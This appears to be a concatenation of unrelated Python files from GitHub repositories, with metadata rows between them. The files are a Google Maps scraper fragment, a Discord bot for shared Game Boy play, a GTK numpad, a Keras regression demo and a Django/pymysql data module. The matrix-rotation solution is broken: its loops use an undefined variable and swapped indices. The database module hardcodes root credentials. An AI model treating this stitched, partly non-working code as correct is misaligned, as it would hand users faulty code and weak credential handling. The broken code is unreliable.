(By.XPATH, "//button[contains(@jsaction, 'pane.reviewChart.moreReviews')]")))
if element:
driver.execute_script("arguments[0].click();", element)
WebDriverWait(driver, 5).until(EC.visibility_of_element_located(
(By.XPATH, "//div[contains(@jsaction, 'mouseover:pane.review.in; mouseout:pane.review.out')]")))
last_index_processed = 0
added_elements = 0
target_string = ""
while added_elements < num_comments:
try:
target_string += str(added_elements)
target_string = target_string[-5:]
samecounts = target_string.count(str(added_elements))
if samecounts >= 2:
break
commentElements = driver.find_elements(
By.XPATH,
"//div[contains(@jsaction, 'mouseover:pane.review.in; mouseout:pane.review.out')]/div[1]/div[4]")
for element in commentElements[last_index_processed:]:
driver.execute_script("arguments[0].scrollIntoView(true);", element)
last_index_processed += 1
if element not in result["this_year"] and element not in result["previous_years"]:
span_elements = element.find_elements(By.XPATH, './div[2]/div[1]/span')
if len(span_elements) == 2:
try:
span_elements[1].click()
except ElementNotInteractableException:
driver.execute_script("arguments[0].click();", span_elements[1])
if span_elements and len(span_elements) > 0:
text = span_elements[0].text
date_element = element.find_element(By.XPATH, './div[1]/span[2]')
date_str = date_element.text
if "year" in date_str:
result["previous_years"].append(text)
else:
result["this_year"].append(text)
added_elements += 1
time.sleep(2)
except StaleElementReferenceException:
print("Encountered StaleElementReferenceException in getReviews, retrying...")
continue
except TimeoutException:
print("Timeout for getReviews")
except Exception as e:
print("***********************ERROR*************************")
print("Error getReviews:", e)
return result
def getHours(htmlCode, page_content):
result = []
try:
element = htmlCode.xpath(
'//img[contains(@aria-label, "Hours")]/../../div[2]')
if element and len(element) > 0:
valueStr = element[0].xpath('@aria-label').extract_first('')
if valueStr:
weekdays = ['Monday', 'Tuesday', 'Wednesday',
'Thursday', 'Friday', 'Saturday', 'Sunday']
lines = valueStr.split(';')
for line in lines:
# Split the line into day and times
parts = line.split(',')
if len(parts) < 2:
continue
# Extract day and remove additional info in parentheses
day = parts[0].strip()
day = day.split(' ')[0] # New line to handle "Thursday (Pancasila Day)" case
times = parts[1].strip()
# Split the times into open time and close time
if "to" in times:
times = times.split(' to ')
if len(times) < 2:
continue
open_time = re.sub(r'[^a-zA-Z0-9 ]', ' ', times[0].strip())
close_time = re.sub(
r'[^a-zA-Z0-9 ]', ' ', times[1].strip())
# Create a dictionary and add it to the list
result.append({'day': day, 'open_time': open_time,
'close_time': close_time})
if "24" in times:
result.append({'day': day, 'open_time': "12:00 AM",
'close_time': "11:59 PM"})
# Sort the list by day of the week
result.sort(key=lambda x: weekdays.index(x['day']))
if not element and "Temporarily closed" in page_content:
result = []
except Exception as e:
print("***********************ERROR*************************")
print("Error get hours:", e)
return []
return result
def getWebsite(htmlCode):
result = ""
element = htmlCode.xpath(
'//a[contains(@data-tooltip, "Open website")]')
if element and len(element) > 0:
valueStr = element[0].xpath('@href').extract_first('')
result = valueStr
return result
def getPlaceInfo(id):
# url = "https://www.google.com/maps/place/?hl=en&q=place_id:ChIJj3JXUTtD0i0RzUQZaHJndOs"
try:
url = "https://www.google.com/maps/place/?hl=en&q=place_id:" + id
# print(url)
driver.get(url)
page_content = driver.page_source
response = Selector(page_content)
# print("- GETTING PHONE")
phone = getPhone(response)
# print("- GET PRICE")
price = getPrice(response)
# print("- GETTING CATEGORY")
category = getCategory(response)
# print("- GETTING MENU")
menu = getMenu(response)
# print("- GETTING HOURS")
hours = getHours(response, page_content)
# print("- GETTING WEBSITE")
website = getWebsite(response)
# print("- GETTING CHECHOUT")
checkout = getCheckout(response)
# print("- GETTING ADDRESS")
address = getAddress(response)
# print("- GETTING BOOKING LINK")
bookingLink = getBookingLink(response)
# print("- GETTING PHOTOS")
photos = getPhotos()
# print("- GETTING REVIEWS")
# reviews = getReviews()
# print("- GETTING ABOUT DATA")
# aboutdata = getAboutData()
data = {
"url": url,
"phone": phone,
"category": category,
"menu": menu,
"hours": hours,
"website": website,
"checkout": checkout,
"address": address,
"bookingLink": bookingLink,
"photos": photos,
"price": price,
# "reviews": {"last_year": reviews["this_year"], "old": reviews["previous_years"]},
# "price": aboutdata[0],
# "hotel_stars": aboutdata[1],
# "description": aboutdata[2],
}
return data
except Exception as e:
print("***********************GET_INFO_ERROR*************************")
print(e)
# traceback.print_exc()
return None
index = 100000
step = 100300
currentStep = index
updatedData = []
problem_paces_ids = []
def debug_error():
try:
with open('data/[{}-{}]-error-places.json'.format(index, step)) as f:
error_data = json.load(f)
data = []
new_erorr = []
for r in error_data:
print("****************PROCESSING_DEBUGER****************", r["place_id"])
newData = getPlaceInfo(r["place_id"])
if newData:
merged_dict = {**newData, **r}
# add to main file
data.append(merged_dict)
print("Data from google:", newData)
# remove from errors-file
else:
new_erorr.append(r)
print("******************PLACE_NOT_ADDED_DEBUGER*************", r["place_id"])
finally:
with open('[{}-{}]-fixed-places.json'.format(index, step), 'w') as f:
json.dump(data, f, indent=4)
with open('[{}-{}]-error-places.json'.format(index, step), 'w') as f:
json.dump(new_erorr, f, indent=4)
driver.quit()
def save_data():
with open('[{}-{}]-places.json'.format(index, currentStep), 'w') as f:
json.dump(updatedData, f, indent=4)
with open('[{}-{}]-error-places.json'.format(index, currentStep), 'w') as f:
json.dump(problem_paces_ids, f, indent=4)
atexit.register(save_data)
if __name__ == "__main__":
# debug_error()
# sys.exit()
try:
with open('./data/not_closed_points.json') as f:
data = json.load(f)
arr = data[index:step]
start_time = time.time()
for i, r in enumerate(arr):
print(f"****************PROCESSING-{step + i}****************\n", r["name"])
newData = getPlaceInfo(r["place_id"])
if (newData):
merged_dict = {**newData, **r}
updatedData.append(merged_dict)
print("********************************\n")
else:
r["url"] = "https://www.google.com/maps/place/?hl=en&q=place_id:{}".format(r["place_id"])
problem_paces_ids.append(r)
print("******************PLACE_NOT_ADDED*************:", r["name"])
currentStep = step + i
end_time = time.time() # End time
except Exception as e:
print("****************MAIN_ERROR***************")
print(e)
# traceback.print_exc()
finally:
elapsed_time = end_time - start_time
print("\n\nElapsed time: ", elapsed_time, "seconds\n\n")
with open('[{}-{}]-places.json'.format(index, currentStep), 'w') as f:
json.dump(updatedData, f, indent=4)
with open('[{}-{}]-error-places.json'.format(index, currentStep), 'w') as f:
json.dump(problem_paces_ids, f, indent=4)
driver.quit()
# fix me is Price there always?
# get subname ChIJJ4sGOVE60i0RPoPmS8rrBWw
# photo from reviews?
# checkin
# about labels could be negative
# web results?
|
andyvauliln/Google-Maps-Scraper
|
scrap_place_info_from_googlemap_site.py
|
scrap_place_info_from_googlemap_site.py
|
py
| 18,017 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2578272371
|
def solution(rows, columns, queries):
answer = []
matrix = [[0] * columns for _ in range(rows)]
for i in range(rows):
for j in range(columns):
matrix[i][j] = i * columns + j + 1
for query in queries:
r1, c1, r2, c2 = query[0]-1, query[1]-1, query[2]-1, query[3]-1
stack = []
for i in range(c1, c2 + 1):
stack.append(matrix[r1][k])
if len(stack) == 1:
continue
else:
matrix[r1][k] = stack[-2]
for j in range(r1 + 1, r2 + 1):
stack.append(matrix[c2][k])
matrix[c2][k] = stack[-2]
for k in range(c2 - 1, c1 - 1, -1):
stack.append(matrix[r2][k])
matrix[r2][k] = stack[-2]
for k in range(r2 - 1, r1 - 1, -1):
stack.append(matrix[k][c1])
matrix[k][c1] = stack[-2]
answer.append(min(stack))
for i in matrix:
print(i)
return answer
print(solution(6,6,[[2,2,5,4]]))
# print(solution(6,6,[[2,2,5,4]]))
|
mayo516/Algorithm
|
주리머/2-3w/행렬 테두리 회전하기.py
|
행렬 테두리 회전하기.py
|
py
| 1,104 |
python
|
en
|
code
| null |
github-code
|
6
|
32341174856
|
'''
gamebot.py
Discord bot to let a discord server play gameboy games together. Put discord bot token into 'token.txt'
Requires:
- PILlow
- Discord.py
- PyBoy
Author: CPunch
'''
import io
import os
from pyboy import PyBoy, WindowEvent
from PIL import Image
import discord
import asyncio
from discord.ext import commands, tasks
from discord.ext.commands import Bot
from discord.ext.tasks import loop
ROMS = { # rom, default save, frames per request
# ================[[ POKEMON ]]================
"pkm_red":("roms/red.gb", "roms/red.sv", 120),
"pkm_blue":("roms/blue.gb", "roms/blue.sv", 120),
"pkm_yellow":("roms/yellow.gbc", "roms/yellow.sv", 120), # for nerds
"pkm_silver":("roms/silver.gbc", "roms/silver.sv", 120),
"pkm_gold":("roms/gold.gbc", "roms/gold.sv", 120),
# ================[[ DRAGON QUEST ]]================
"dragon_quest":("roms/quest.gbc", "roms/quest.sv", 120),
# ================[[ TETRIS ]]================
"tetris":("roms/tetris.gb", "roms/tetris.sv", 60),
# ================[[ FROGGER ]]================
"frogger":("roms/frogger.gbc", "roms/frogger.sv", 60),
# ================[[ Harvest Moon ]]================
"harvest_moon":("roms/harvest2.gbc", "roms/harvest2.sv", 150),
# ================[[ Dr Mario ]]================
"dr_mario":("roms/dr_mario.gb", "roms/dr_mario.sv", 60),
}
# generates the save state
for key in ROMS:
rom = ROMS[key]
print(rom[0])
vm = PyBoy(rom[0], window_type="headless")
for i in range(2000):
vm.tick()
vm.save_state(open(rom[1], "wb"))
GIF_SHOOT_MODULUS = 8 # every frame a modules of this will be added to the gif
SCALE = 3 # scale the images up in size before sending to discord
COMMAND_PREFIX = '!'
CLEAN_IDLE_GAMES = False # if a game doesn't have input for an hour, clean it up
EMOJI_REACTIONS = [
'⬆', # up arrow
'⬇', # down arrow
'⬅', # left arrow
'➡', # right arrow
'🅰', # a button
'🅱', # b button
'➖', # start
'➕', # select
'❌' # no input
]
REACTION_BUTTONS = [
(WindowEvent.PRESS_ARROW_UP, WindowEvent.RELEASE_ARROW_UP),
(WindowEvent.PRESS_ARROW_DOWN, WindowEvent.RELEASE_ARROW_DOWN),
(WindowEvent.PRESS_ARROW_LEFT, WindowEvent.RELEASE_ARROW_LEFT),
(WindowEvent.PRESS_ARROW_RIGHT, WindowEvent.RELEASE_ARROW_RIGHT),
(WindowEvent.PRESS_BUTTON_A, WindowEvent.RELEASE_BUTTON_A),
(WindowEvent.PRESS_BUTTON_B, WindowEvent.RELEASE_BUTTON_B),
(WindowEvent.PRESS_BUTTON_START, WindowEvent.RELEASE_BUTTON_START),
(WindowEvent.PRESS_BUTTON_SELECT, WindowEvent.RELEASE_BUTTON_SELECT),
(None, None)
] # corresponds with EMOJI_REACTIONS
WHITELISTED_USERS = [
168807635737378816
] # users that have permissions in all servers to run commands
WHITELISTED_CHANNELS = [
726144063845302411,
726512748103729183,
725884904147124355,
726181851705638963,
726356601065177158
] # channels that won't be cleaned up auto-matically
ACTIVE_CHANNELS = {}
# make sure the saves directory exists
if not os.path.exists("./saves"):
os.makedirs("./saves")
def activateChannel(id, rom):
# start our vm, this vm is exclusive to this channel ONLY
vm = PyBoy(ROMS[rom][0], window_type="headless", debug=False)
vm.set_emulation_speed(0) # don't delay for anything, just compute the instructions as fast as possible
vm.load_state(open(ROMS[rom][1], "rb"))
ACTIVE_CHANNELS[id] = {}
ACTIVE_CHANNELS[id]["active"] = True
ACTIVE_CHANNELS[id]["rom"] = rom
ACTIVE_CHANNELS[id]["vm"] = vm
ACTIVE_CHANNELS[id]["frames"] = ROMS[rom][2]
ACTIVE_CHANNELS[id]["state"] = io.BytesIO(open(ROMS[rom][1], "rb").read()) # copy default state
#ACTIVE_CHANNELS[id]["state"] = io.BytesIO()
ACTIVE_CHANNELS[id]["state"].seek(0)
def saveState(id):
with open("./saves/" + ACTIVE_CHANNELS[id]["rom"] + str(id), "wb") as outfile:
outfile.seek(0)
outfile.write(ACTIVE_CHANNELS[id]["state"].getvalue())
def getScreenCap(vm):
return vm.botsupport_manager().screen().screen_image().resize((160*SCALE, 144*SCALE), resample=Image.BOX)
# start our discord bot
client = Bot(description="Play GameBoy games with friends! :)", command_prefix=COMMAND_PREFIX, pm_help = False)
# call this everytime a game is started or stoped
async def status_change():
await client.change_presence(activity=discord.Game(str(len(ACTIVE_CHANNELS)) + " gameboy games | !help"))
async def runGame(channel):
vm = ACTIVE_CHANNELS[channel.id]["vm"]
# all of these try, except are because discord.py loves to throw errors if things aren't *exactly* the way it expects it to be.
# we NEED to clean up the vm NO MATTER WHAT! otherwise, it'll never get cleaned up by python's garbage collector and we'll run out
# of memory. memory is precious, esp. on a raspberry pi with spotty internet connection so discord.py throws errors like it's at a rave.
try:
await status_change()
except:
ACTIVE_CHANNELS[channel.id]["active"] = False
try:
while ACTIVE_CHANNELS[channel.id]["active"]:
message = None
async with channel.typing(): # while we are loading the state & emulating 30 frames (1 second of gameplay)
frames = []
# press button down for 1/4 a second
if "prebutton" in ACTIVE_CHANNELS[channel.id] and ACTIVE_CHANNELS[channel.id]["prebutton"] != None:
vm.send_input(ACTIVE_CHANNELS[channel.id]["prebutton"])
for i in range(15):
vm.tick()
if i % GIF_SHOOT_MODULUS == 0: # add a screen capture to the frame queue
frames.append(getScreenCap(vm))
if "postbutton" in ACTIVE_CHANNELS[channel.id] and ACTIVE_CHANNELS[channel.id]["postbutton"] != None:
vm.send_input(ACTIVE_CHANNELS[channel.id]["postbutton"])
for i in range(ACTIVE_CHANNELS[channel.id]["frames"] - 15):
vm.tick()
if (i+15) % GIF_SHOOT_MODULUS == 0: # add a screen capture to the frame queue (we add 15 to match our previous frames)
frames.append(getScreenCap(vm))
ACTIVE_CHANNELS[channel.id]["state"].seek(0)
vm.save_state(ACTIVE_CHANNELS[channel.id]["state"])
ACTIVE_CHANNELS[channel.id]["state"].seek(0)
# final frame screenshot
frames.append(getScreenCap(vm))
# take the screenshot
tmpImage = io.BytesIO()
tmpImage.seek(0)
frames.insert(0, frames[len(frames)-1]) # set preview to the last frame
frames[0].save(tmpImage, format='GIF', append_images=frames[1:], save_all=True, duration=((1000 * (ACTIVE_CHANNELS[channel.id]["frames"] / 60)) / len(frames)-1), optimize=True)
tmpImage.seek(0)
reactionTry = 5
while reactionTry > 0:
try:
# send screenshot to the channel
message = await channel.send(file=discord.File(tmpImage, filename="scrn.gif"))
# add reactions to message
for emoji in EMOJI_REACTIONS:
await message.add_reaction(emoji)
reactionTry = 0
except:
if message != None:
await message.delete()
reactionTry = reactionTry - 1
waited_log = 0
while ACTIVE_CHANNELS[channel.id]["active"]:
waited_log += 1
# if no activity for an hour, close session.
if CLEAN_IDLE_GAMES and channel.id not in WHITELISTED_CHANNELS and waited_log > 720:
ACTIVE_CHANNELS[channel.id]["active"] = False
saveState(channel.id)
await channel.send("> ⛔ game has been stopped due to inactivity. saved state!")
break
# wait for reactions
await asyncio.sleep(5)
message = await channel.fetch_message(message.id)
most_reacted = (None, 1)
for reaction in message.reactions:
if str(reaction) in EMOJI_REACTIONS: # is a valid reaction
if (most_reacted[1] < reaction.count):
most_reacted = (str(reaction), reaction.count)
else:
continue
if most_reacted[1] == 1: # no reactions, wait for 5 more seconds
continue
ACTIVE_CHANNELS[channel.id]["prebutton"] = REACTION_BUTTONS[EMOJI_REACTIONS.index(most_reacted[0])][0]
ACTIVE_CHANNELS[channel.id]["postbutton"] = REACTION_BUTTONS[EMOJI_REACTIONS.index(most_reacted[0])][1]
# quit reaction loop :)
break;
# deletes the message
await message.delete()
except:
saveState(channel.id)
try:
await channel.send("> ⛔ game crashed or forced shutdown! however state was saved, restore the save using load.")
ACTIVE_CHANNELS[channel.id]["active"] = False
except:
pass
try:
# we're no longer wanted!! kill it!
vm.stop(save=False) # we have our own saving implementation, saving states.
del ACTIVE_CHANNELS[channel.id]
await channel.send("> ✅ thanks for playing!")
await status_change()
except:
pass
@client.event
async def on_ready():
print(client.user.name + ' is ready!')
await status_change()
class ROMSTATE(commands.Cog, name='ROM running/loading/saving'):
"""Deals with loading/saving/running ROMs"""
@commands.command(pass_context = True, help="Starts the ROM, if ROM is omitted PKM_RED will be started", usage="(ROM)")
@commands.guild_only()
async def start(self, ctx, rom = "pkm_red"):
if ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS:
rom = rom.lower()
if not rom in ROMS:
await ctx.message.channel.send("> ⛔ game '" + rom + "' not found! use 'list' to get a list of roms.")
return
if ctx.message.channel.id in ACTIVE_CHANNELS:
await ctx.message.channel.send("> ⛔ game is already running in this channel! use 'stop' to stop the current game.")
return
await ctx.message.channel.send("> ✅ starting '" + rom.upper() + "'!")
activateChannel(ctx.message.channel.id, rom)
await runGame(ctx.message.channel)
@commands.command(pass_context = True, help="Stops the current ROM")
@commands.guild_only()
async def stop(self, ctx):
if (ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS) and ctx.message.channel.id in ACTIVE_CHANNELS:
ACTIVE_CHANNELS[ctx.message.channel.id]["active"] = False
@commands.command(pass_context = True, help="Force stops the current ROM. You *might* LOSE ALL PROGRESS.")
@commands.guild_only()
async def forcestop(self, ctx):
if (ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS) and ctx.message.channel.id in ACTIVE_CHANNELS:
ACTIVE_CHANNELS[ctx.message.channel.id]["vm"].stop(save=False)
del ACTIVE_CHANNELS[ctx.message.channel.id]
await status_change()
await ctx.message.channel.send("> ✅ force stoped successfully!")
@commands.command(pass_context = True, help="Saves the current state of the ROM to the channel")
@commands.guild_only()
async def save(self, ctx):
if (ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS) and ctx.message.channel.id in ACTIVE_CHANNELS:
saveState(ctx.message.channel.id)
await ctx.message.channel.send("> ✅ saved state successfully!")
@commands.command(pass_context = True, help="Loads ROM with saved state, if ROM is omitted PKM_RED will be used.", usage="(ROM)")
@commands.guild_only()
async def load(self, ctx, rom = "pkm_red"):
if ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS:
rom = rom.lower()
if not rom in ROMS:
await ctx.message.channel.send("> ⛔ game '" + rom + "' not found! use 'list' to get a list of ROMs.")
return
if ctx.message.channel.id in ACTIVE_CHANNELS:
await ctx.message.channel.send("> ⛔ cannot load state while game is running! use 'stop' to stop the current game.")
return
if os.path.exists("./saves/" + rom + str(ctx.message.channel.id)):
with open("./saves/" + rom + str(ctx.message.channel.id), "rb") as infile:
activateChannel(ctx.message.channel.id, rom)
# load file into state
await ctx.message.channel.send("> ✅ starting '" + rom.upper() + "'!")
ACTIVE_CHANNELS[ctx.message.channel.id]["vm"].load_state(infile)
await runGame(ctx.message.channel) # start game
else:
await ctx.message.channel.send("> ⛔ no state was saved!")
class REACTCONTROL(commands.Cog, name='Reaction button controls'):
"""Category for commands for buttons"""
@commands.command(pass_context = True, help="Lists controls")
@commands.guild_only()
async def controls(self, ctx):
strng = "`Here's a list of the controls:`\n"
for i in range(len(EMOJI_REACTIONS)):
strng += "> " + EMOJI_REACTIONS[i] + "\t"
if REACTION_BUTTONS[i][0] == WindowEvent.PRESS_ARROW_UP:
strng += "UP"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_ARROW_DOWN:
strng += "DOWN"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_ARROW_LEFT:
strng += "LEFT"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_ARROW_RIGHT:
strng += "RIGHT"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_BUTTON_A:
strng += "A BUTTON"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_BUTTON_B:
strng += "B BUTTON"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_BUTTON_START:
strng += "START"
elif REACTION_BUTTONS[i][0] == WindowEvent.PRESS_BUTTON_SELECT:
strng += "SELECT"
elif REACTION_BUTTONS[i][0] == None:
strng += "NO INPUT"
else:
strng += "ERR"
strng += "\n"
await ctx.message.channel.send(strng)
class MEMMANIP(commands.Cog, name='Gameboy Memory manipulation'):
"""Category for commands that allow you to manipulate memory in the gameboy"""
@commands.command(pass_context = True, help="Writes BYTE to ADDRESS in RAM", usage="[ADDRESS] [BYTE]")
@commands.guild_only()
async def write(self, ctx, addr, value):
addr = addr.replace("0x", "")
value = value.replace("0x", "")
if (ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS) and ctx.message.channel.id in ACTIVE_CHANNELS:
try:
ACTIVE_CHANNELS[ctx.message.channel.id]["vm"].set_memory_value(int(addr, 16), int(value, 16))
except:
await ctx.message.channel.send("> ⛔ failed to write to 0x" + addr + "!")
return
await ctx.message.channel.send("> ✅ wrote 0x" + value + " to 0x" + addr + " successfully!")
@commands.command(pass_context = True, help="Reads BYTE from ADDRESS in RAM", usage="[ADDRESS]")
@commands.guild_only()
async def read(self, ctx, addr):
addr = addr.replace("0x", "")
if (ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS) and ctx.message.channel.id in ACTIVE_CHANNELS:
try:
res = ACTIVE_CHANNELS[ctx.message.channel.id]["vm"].get_memory_value(int(addr, 16))
await ctx.message.channel.send("> 0x" + addr + " : " + str(hex(res)))
except:
await ctx.message.channel.send("> ⛔ failed to read " + addr)
return
@client.command(pass_context = True, name='list', help="Lists all available ROMs")
@commands.guild_only()
async def _list(ctx):
if ctx.message.author.guild_permissions.administrator or ctx.message.author.id in WHITELISTED_USERS:
strng = "Here are a list of the avalible roms:```\n"
i = 0
for rom in ROMS:
i+=1
strng = strng + str(i) + ". " + rom.upper() + "\n"
strng += "```"
await ctx.message.channel.send(strng)
client.add_cog(ROMSTATE())
client.add_cog(MEMMANIP())
client.add_cog(REACTCONTROL())
client.run(open("token.txt", "r").readline())
|
CPunch/Gamebot
|
bot.py
|
bot.py
|
py
| 17,355 |
python
|
en
|
code
| 4 |
github-code
|
6
|
18849568621
|
# -*- coding: UTF-8 -*-
import gtk
import os
import pango
import gobject
MULT = 1
KB_COLS = 13
KB_ROWS = 1
buttons_ru = [ "ESC", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "BACKSP", "GO"]
class Numpad(gtk.Window):
def __init__(self):
super(Numpad, self).__init__()
self.flag = 0
self.text = ""
pangoFont = pango.FontDescription("Tahoma 24.2")
try:
gobject.signal_new("z_signal", self, gobject.SIGNAL_RUN_FIRST, gobject.TYPE_NONE, (gobject.TYPE_BOOLEAN, ))
except:
pass
self.set_decorated(False)
self.modify_font(pangoFont)
self.set_title("Set timeout")
self.tb = gtk.TextBuffer()
self.tb.set_text("Set timeout")
self.set_default_size(MULT*160, MULT*90)
self.tv = gtk.TextView(self.tb)
self.tv.modify_font(pangoFont)
self.tv.set_editable(False)
self.tv.set_border_width(3)
self.vbox = gtk.VBox()
self.vbox.add(self.tv)
self.hbox = {}
for i in range(KB_ROWS):
self.hbox[i] = gtk.HBox()
for j in range(KB_COLS):
self.button = gtk.Button(label = buttons_ru[i*KB_COLS+j])
self.button.connect("clicked", self.on_click, i*KB_COLS+j)
self.hbox[i].add(self.button)
self.vbox.add(self.hbox[i])
self.add(self.vbox)
self.set_position(gtk.WIN_POS_CENTER)
def on_click(self, e, prm):
if self.flag == 0:
self.tb.delete(self.tb.get_start_iter(), self.tb.get_end_iter())
if buttons_ru[prm] == "BACKSP":
start = self.tb.get_end_iter()
end = self.tb.get_end_iter()
start.backward_char()
self.tb.delete(start, end)
elif buttons_ru[prm] == "GO":
self.flag = 0
self.emit("z_signal", True)
elif buttons_ru[prm] == "ESC":
self.flag = 0
self.emit("z_signal", False)
else:
self.tb.insert(self.tb.get_end_iter(), buttons_ru[prm])
self.flag = 1
def get_text_to_find(self):
self.text = self.tb.get_text(self.tb.get_start_iter(), self.tb.get_end_iter())
try:
self.text = str(int(self.text))
except:
self.text = '120'
return self.text
|
Andvari/Wordscard
|
src/Numpad.py
|
Numpad.py
|
py
| 2,454 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8642734794
|
from typing import (
Protocol,
Type,
runtime_checkable,
)
@runtime_checkable
class ClientProtocol(Protocol):
async def connect(self):
...
async def disconnect(self):
...
def is_client(cls: Type[ClientProtocol]) -> bool:
try:
return issubclass(cls, ClientProtocol)
except TypeError:
return False
|
avito-tech/trainspotting
|
trainspotting/clients.py
|
clients.py
|
py
| 360 |
python
|
en
|
code
| 5 |
github-code
|
6
|
30545228636
|
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
import matplotlib.pyplot as plt
np.random.seed(1337)
# create some data
X = np.linspace(-1,1,200)
np.random.shuffle(X)
Y = 0.5 * X + np.random.normal(0,0.1,(200,))
# plot data
plt.scatter(X,Y)
plt.show()
X_train, Y_train = X[:160],Y[:160] # train the first 160 data points
X_test, Y_test = X[160:],Y[160:] # train the last 40 data sets
# build the model
model = Sequential()
model.add(Dense(output_dim=1,input_dim=1))
# activate the model
model.compile(loss = 'mse',optimizer='sgd') # loss function(mses:均方误差) and optimizing method(sgd:随机梯度)
# train the model
print('Training...')
for step in range(301):
cost = model.train_on_batch(X_train,Y_train)
if step % 100 == 0:
print('train cost:',cost)
# Test the model
print('Testing...')
cost = model.evaluate(X_test,Y_test,batch_size=40)
print('test cost:',cost)
W,b = model.layers[0].get_weights()
print('Weights=',W,' biases=',b)
|
limingwu8/ML
|
regression/regression.py
|
regression.py
|
py
| 1,009 |
python
|
en
|
code
| 1 |
github-code
|
6
|
1492499597
|
import pymysql
from pymysql import connect
# from baiyu.function.zudai_to_fumudai import *
from baiyu.models import *
import datetime
class OpenDB(object):
def __init__(self):
# 初始化
self.conn = connect(host='localhost', port=3306, user='root', password='123456', database='forecastsystem', charset='utf8')
self.cursor = self.conn.cursor()
def __enter__(self):
# 返回游标进行执行操作
return self.cursor
def __exit__(self, exc_type, exc_val, exc_tb):
# 结束提交数据并关闭数据库
self.conn.commit()
self.cursor.close()
self.conn.close()
'''
#获取祖代鸡引种周度总量,返回类型:list
#by sujie 2019/05/27
'''
def get_introduced_detail_all():
res = []
try:
db_res = IntroducedInfoDetail.objects.all()
for index in db_res:
res.append(index)
except Exception as e:
res = []
print(e)
return res
def get_introduced_detail_info(bird_type,nGen):
introduce_res = []
with OpenDB() as cursor:
sql = '''
SELECT
bi.id,
bi.YEAR,
bi.WeekNum,
bi.startDate,
bi.endDate,
bc.companyName,
bs.SpeciesName,
bf.feedWayName,
bi.RuSheNum,
bi.LivePeriod,
bi.nGeneration,
bi.qzhyFlag,
bi.Remark
FROM
baiyu_introducedinfodetail bi,
baiyu_companyinfo bc,
baiyu_feedway bf,
baiyu_speciesinfo bs
WHERE
bi.CompanyId = bc.id
AND bi.feedWayId = bf.id
AND bi.SpeciesId = bs.id
AND bi.nBirdsType = %d
AND bi.nGeneration = %d
''' % (bird_type,nGen)
try:
cursor.execute(sql)
db_res = cursor.fetchall()
for i in db_res:
introduce_res.append(i)
except Exception as e:
print('Error Reason is :',e)
print('standard_res',introduce_res)
return introduce_res
'''
#获取祖代鸡引种周度总表记录条数,返回类型:int
#by sujie 2019/05/27
'''
def get_count_ProgenitorIntroduced(bird_type,nGen):
try:
count = IntroducedInfo.objects.filter(nBirdsType=bird_type,nGeneration=nGen).count()
except Exception as e:
count = 0
print('Error Reason is :',e)
return count
'''
#获取商品代周度统计,返回类型:list
#by sujie 2019/05/27
'''
def get_sWeekly_statistic():
res = []
try:
db_res = WeeklyStatisticTable.objects.all()
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
'''
#获取祖代鸡和父母代机周度标准参数,传入参数为代次,祖代鸡代次为1,父母代为2,商品代为3,返回类型:list
#by sujie 2019/05/30
'''
def get_weekly_standard(nBirdsType,nGeneration):
standard_res = []
with OpenDB() as cursor:
sql = '''
SELECT
bws.WeekNum,
bws.siTaoRate,
bws.ChanDanRate,
bws.RuFuZhongDanRate,
bws.ShouJingRate,
bws.FuHuaRate,
bws.JianChuRate,
bws.SaleRate,
bws.nGeneration,
bs.SpeciesName,
bf.feedWayName,
bws.Remark
FROM
baiyu_weekstandardtable bws
JOIN baiyu_speciesinfo bs
JOIN baiyu_feedway bf
WHERE
bws.SpeciesId = bs.id
AND bws.feedWayId = bf.id
AND bws.nBirdsType = %d
AND bws.nGeneration = %d
''' % (nBirdsType,nGeneration)
try:
cursor.execute(sql)
db_res = cursor.fetchall()
print('****',db_res)
for i in db_res:
standard_res.append(i)
except Exception as e:
print('Error Reason is :',e)
return standard_res
'''
#获取父母代鸡周度标准参数,返回类型:list
#by sujie 2019/05/30
'''
# def get_fumudai_weekly_standard():
# res = []
# try:
# db_res = WeekStandardTable.objects.all()
# for index in db_res:
# res.append(index)
# except Exception as e:
# print('Error Reason is :',e)
# return res
'''
#获取商品代鸡日度标准参数,返回类型:list
#by sujie 2019/05/30
'''
def get_shangpindai_daily_standard(bird_type):
res = []
try:
db_res = DailyStandardTable.objects.all().values().filter(nBirdsType=bird_type)
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
'''
#获取商品代鸡年度标准参数,返回类型:list
#by sujie 2019/05/30
'''
def get_shangpindai_yearly_param():
res = []
try:
db_res = YearParameter.objects.all()
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
'''
#获取祖代鸡/父母代鸡的总参数,返回类型:list
#by sujie 2019/05/30
'''
def get_all_param(bird_type,nGeneration):
res = []
try:
db_res = WholeParameter.objects.all().values().filter(nBirdsType=bird_type,nGeneration = nGeneration)
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
'''
#获取年度淘汰鸡肉参数(祖代淘汰鸡、父母代淘汰鸡)
#by sujie 2019/05/30
'''
def get_tcjirou_param(bird_type,nGeneration):
res = []
try:
db_res = YearTaotaiJirouParam.objects.all().filter(nBirdsType=bird_type,nGeneration = nGeneration)
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
'''
#获取周度的标注日期
#by sujie 2019/06/04
'''
def get_weeklydate_standard():
res = []
try:
db_res = WeekDateStandard.objects.all()
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
###################################################################
'''
